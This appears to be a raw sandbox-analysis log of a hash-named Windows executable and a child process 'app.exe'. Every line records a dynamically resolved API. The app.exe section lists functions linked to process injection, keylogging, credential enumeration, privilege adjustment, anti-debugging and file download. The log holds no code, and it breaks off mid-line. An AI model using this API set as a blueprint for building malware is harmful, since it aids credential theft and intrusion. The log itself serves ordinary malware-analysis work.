\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ReleaseStgMedium (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter NetShareEnum (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter SLGetWindowsInformationDWORD (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FindFirstStreamW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FindNextStreamW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter PnpIsFilePnpDriver (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter DevRtlGetThreadLogToken (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004436)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter EncryptMessage (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter DecryptMessage (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateRemoteThread (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetNativeSystemInfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLangID (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SetFileTime (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter HeapWalk (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter IsNativeVhdBoot (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter DebugBreak (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlGetNtProductType (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LdrLoadDll (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LdrUnloadDll (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LdrGetDllHandle (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LdrGetProcedureAddress (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlAddVectoredExceptionHandler (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter NtSystemDebugControl (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBufferEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetTcpTable2 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetBestRoute (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CredEnumerateA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CredEnumerateW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatusEx (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithTokenW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter LsaLookupSids (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemFunction032 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter SystemFunction033 (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetOpenW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetConnectW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionW (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileA (UID: 00000000-00002452)\n \"app.exe\" called \"GetProcAddress\" with a parameter 